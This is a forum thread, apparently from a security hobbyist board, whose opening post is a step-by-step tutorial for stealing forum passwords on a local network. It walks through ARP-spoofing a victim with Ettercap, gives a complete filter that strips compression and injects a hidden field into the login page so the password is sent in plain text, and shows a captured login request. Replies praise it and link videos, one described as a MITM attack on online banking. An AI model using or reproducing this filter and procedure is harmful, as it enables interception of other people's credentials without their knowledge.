Results 1 to 9 of 9

Thread: mini HowTo: sniffing for username and password, RemoteExploit Forum

  1. #1
    Just burned his ISO
    Join Date
    May 2006
    Posts
    2

    Default mini HowTo: sniffing for username and password, RemoteExploit Forum

    sorry for my totally POOR English :-(

    I did this mini tutorial cos i wanted to play with ettercap filters.

    If u had ever sniffed for username and password from RE Forum, U would noticed that the username is sent in clear text but the password is sent as a MD5 hash. The MD5 hash is computed by a javascript. If we look into the source code of the main forum page "http://forums.remote-exploit.org/index.php" we can notice that the MD5 javascript is located here "http://forums.remote-exploit.org/clientscript/vbulletin_md5.js". Lets look at the first line of the login section of the index.php. 'onsubmit' means that when we press LOG IN button 'md5hash' javascript function is executed. The value entered to password field 'vb_login_password'is sent to the javascript and next the MD5 hash is computed and send back to the FORM as a 'vb_login_md5password' and 'vb_login_md5password_utf'.How to "hack" this login method ? Of course we can sniff username and md5 hash and then md5 can be broken by rainbow table. But i think there are a lot of other better way to get the password. I like Ettercap and its packet filters. That’s why I 'hacked' the forum using my own Ettercap filter. OK. the main idea is that the password must be forced to be send to the web server in plain text. it's obvious that the User shouldnt notices that his/her network is sniffed. So the login script must be modified in that way to allow normal logging into the forum. The simplest way to do this is modifying login section of index.php. As we see bellow, there are input tags, type='hidden'. These fields are filed in by a java md5hash script and next are sent to the server. I think the best solution is just to add new input field and copy password string to there. To do this, existing html code must be modified. Lets use ETTERCAP and its filters. But first we should look at the http traffic generated by RE Forum during logging in. Start the ETHEREAL. As we see, HTML source code isn’t sent in plain text! It is compressed by gzip (deflate). To disable this feature we have to remove from HTTP packets this entry "Accept-Encoding:gzip,deflate" and replace it by something other(i've seen ettercap and yahoo tutorial,thats why i know this ;-). Lets use one of Ettetcap filters to eliminate gzip compression. Now we can sniff network and we notice that the forum page is sent without gzip compresion ! pure HTML code ! so let's modify sth. I suggest replace a useless part of line 14 by sth useful like new input tag ;-)
    I added ONFOCUS to login button section cos I wanted to assign "vb_login_password.value" to x.value from new input tag to send the x to the server in plain text.

    onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" />

    now we have new useless parameter 'x' which is send in plain text to the server to the 'login.php'. Server ignores it, however we don’t cos this is our desired password!

    To start sniffing, ettercap filter must be compiled.
    1.create new empty file ForumFilter.filter
    2.copy and paste the included ettercap filter into the file
    3.compile it. 'etterfilter ForumFilter.filter -o ForumFilter'

    next, start ettercap
    1.Sniff ->Unified Sniffing
    2.Host -> Scan for Hosts
    3.Host -> Host List and add victims machine to target 1 and router etc. to target 2
    4.MITM -> ARP Spoofing, Sniff Remote connections
    5.Filter - > Load new filter, ...than open our ForumFilter
    6.Start - > start sniffing

    next start ETHEREAL
    network is sniffed
    if everything is done correctly, the username and password should appear in plain text in the sniffer.

    this is the screenshot from ETHEREAL
    Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://forums.remote-exploit.org/index.php
    Cookie: bbsessionhash=5613a271e92e68758bede781f8795775; bblastvisit=1157060031; bblastactivity=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 183

    vb_login_username=eXterminator&vb_login_password=&x=#######&s=&do=login&vb_login_md5password=10219952f5b55f33 4be8e24b6ce0ed6f&vb_login_md5password_utf=10216952 f5b87d8b88e24b6ab0ed6fHTTP/1.0 200 OK





    line nr 14 after modification:
    <td><input type="submit" class="button" value="Log in" tabindex="104" title="Enter your username and password in the boxes provided to login, or c" onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" /></td>


    this is the login form from index.php
    <!-- login form -->
    1 <form action="login.php" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
    2 <script type="text/javascript" src="clientscript/vbulletin_md5.js"></script>
    3 <table cellpadding="0" cellspacing="3" border="0">
    4
    5 <tr>
    6 <td class="smallfont">User Name</td>
    7 <td><input type="text" class="bginput" style="font-size: 11px" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" onfocus="if (this.value == 'User Name') this.value = '';" /></td>
    8 <td class="smallfont" colspan="2" nowrap="nowrap"><label for="cb_cookieuser_navbar"><input type="checkbox" name="cookieuser" value="1" tabindex="103" id="cb_cookieuser_navbar" accesskey="c" />Remember Me?</label></td>
    9 </tr>
    10 <tr>
    11 <td class="smallfont">Password</td>
    12
    13 <td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" size="10" accesskey="p" tabindex="102" /></td>
    14 <td><input type="submit" class="button" value="Log in" tabindex="104" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile for yourself." accesskey="s" /></td>
    15 </tr>
    16 </table>
    17 <input type="hidden" name="s" value="" />
    18 <input type="hidden" name="do" value="login" />
    19 <input type="hidden" name="vb_login_md5password" />
    20 <input type="hidden" name="vb_login_md5password_utf" />
    21 </form>

    <!-- / login form -->

    MY ETTERCAP FILTER

    if (search(DATA.data, "gzip")) {
    replace("gzip", " "); # note: four spaces in the replacement string
    msg("whited out gzip\n");
    }
    if (search(DATA.data, "deflate")) {
    replace("deflate", " "); # note: seven spaces in the replacement string
    msg("whited out deflate\n");
    }
    if (search(DATA.data, "gzip,deflate")) {
    replace("gzip,deflate", " "); # note: seven spaces in the replacement string
    msg("whited out deflate and gzip\n");
    }
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
    }
    if (search(DECODED.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
    msg("zapped AcceptDECODED-Encoding!\n");
    }
    if (search(DATA.data, "click the 'register'")) {
    replace("lick the 'register' button to create a profile for yourself.\x22 accesskey=\x22s\x22 />", "\x22 onfocus=\x22x.value =vb_login_password.value\x22 /><input type=\x22hidden\x22 name=\x22x\x22 />");
    msg("REPLACED\n");
    }

  2. #2
    xatar
    Guest

    Default

    good analysis of the code structure and system. I also really like the use of Ettercap filters to alter source code in transit.

    Have you thought of making a video of this as that works a lot better for tutorials?

  3. #3
    Just burned his ISO
    Join Date
    Aug 2006
    Posts
    18

    Default

    Have you thought of making a video of this as that works a lot better for tutorials?
    It will be much better than only text.

  4. #4
    Just burned his ISO
    Join Date
    May 2006
    Posts
    2

    Talking

    I made simple video tutorial you requested.
    It presents how the login and the password for Remote-exploit Forum can be easy sniffed.

    This is my second video tutorial so forgive me some editing mistakes.
    http://www.raszewski.info/ettercap_REforum.avi


    This is my first tut. MITM attack + online banking. Unfortunately this is polish version of the tutorial.
    http://ta2man.info/mitmByRashid.avi

    enjoy

  5. #5

    Default Nice Vids

    ThanX for sharing them I enjoyed them both.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  6. #6
    Just burned his ISO
    Join Date
    Sep 2006
    Posts
    3

    Default

    hehehehehe

    Real nice

  7. #7
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    2

    Default

    For those who get an error when trying to read the file ...
    you will need to have TechSmith Video Codec

    that you want to download it here ---> http://download.techsmith.com/tscc/tscc.exe


    U.

  8. #8
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    2

    Default

    Oupsssssss I forgot!

    As Christmas is getting nearer ... you could add a nice "koledy" sound to the first video ...so we can get into the mood of you motherland

    U.

  9. #9
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    1

    Default

    Is this technique can used to sniff virtual url to get the actual url?

    Example:
    virtual url: domain.com/member/member.php
    actual url: domain.com/member/vip/member.php?id=1

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •